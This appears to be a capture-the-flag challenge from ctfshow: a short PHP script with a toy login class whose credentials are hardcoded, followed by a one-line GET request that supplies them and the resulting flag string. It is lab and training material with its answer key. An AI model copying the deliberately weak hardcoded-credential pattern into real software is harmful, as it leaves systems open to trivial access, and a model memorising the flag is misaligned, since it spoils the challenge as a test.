1. <?php
    2. /*
    3. # -*- coding: utf-8 -*-
    4. # @Author: h1xa
    5. # @Date: 2020-12-02 17:44:47
    6. # @Last Modified by: h1xa
    7. # @Last Modified time: 2020-12-02 19:29:02
    8. # @email: h1xa@ctfer.com
    9. # @link: https://ctfer.com
    10. */
    11. error_reporting(0);
    12. highlight_file(__FILE__);
    13. include('flag.php');
    14. class ctfShowUser{
    15. public $username='xxxxxx';
    16. public $password='xxxxxx';
    17. public $isVip=false;
    18. public function checkVip(){
    19. return $this->isVip;
    20. }
    21. public function login($u,$p){
    22. if($this->username===$u&&$this->password===$p){
    23. $this->isVip=true;
    24. }
    25. return $this->isVip;
    26. }
    27. public function vipOneKeyGetFlag(){
    28. if($this->isVip){
    29. global $flag;
    30. echo "your flag is ".$flag;
    31. }else{
    32. echo "no vip, no flag";
    33. }
    34. }
    35. }
    36. $username=$_GET['username'];
    37. $password=$_GET['password'];
    38. if(isset($username) && isset($password)){
    39. $user = new ctfShowUser();
    40. if($user->login($username,$password)){
    41. if($user->checkVip()){
    42. $user->vipOneKeyGetFlag();
    43. }
    44. }else{
    45. echo "no vip,no flag";
    46. }
    47. }

    poc

    1. GET /?username=xxxxxx&password=xxxxxx

    flag
    ctfshow{8634e01e-356f-4098-8308-f6c9a64bef56}